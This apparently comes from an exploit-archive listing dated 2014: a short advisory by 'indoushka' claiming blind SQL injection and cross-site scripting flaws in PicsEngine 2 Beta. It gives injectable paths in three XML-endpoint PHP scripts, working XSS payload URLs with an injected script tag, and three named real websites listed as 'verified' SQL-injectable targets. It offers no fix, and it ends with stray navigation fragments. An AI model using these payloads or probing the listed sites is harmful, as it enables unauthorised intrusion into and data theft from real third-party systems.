PicsEngine 2 Beta Cross Site Scripting / SQL Injection

Posted on 10 March 2014

PicsEngine Application error message Vulnerability
==================================================
Author indoushka
==================================================
vendor : Powered by PicsEngine 2 Beta
==================================================

Blind SQL Injection :

/chabluesphotos/xml/comments.php?id=if
/chabluesphotos/xml/get.php?id=if
/chabluesphotos/xml/photos.php?id=if

Cross site scripting (verified)

/chabluesphotos/xml/comments.php?id=1'%22()%26%25<ScRiPt%20>prompt(213771818860)</ScRiPt>
/chabluesphotos/xml/get.php?id=1'%22()%26%25<ScRiPt%20>prompt(213771818860)</ScRiPt>
/chabluesphotos/xml/photos.php?id=1'%22()%26%25<ScRiPt%20>prompt(213771818860)</ScRiPt>

SQL injection (verified)

http://www.tsampa.be/pics/xml/photos.php?id=1

http://www.sylval.com/galerie/xml/photos.php?id=1

http://lacroizette.sur-le-web.fr/locaux/xml/photos.php?id=1

ube pcr
llc

TOP

Malware :

Last 20

Exploits :

Last 20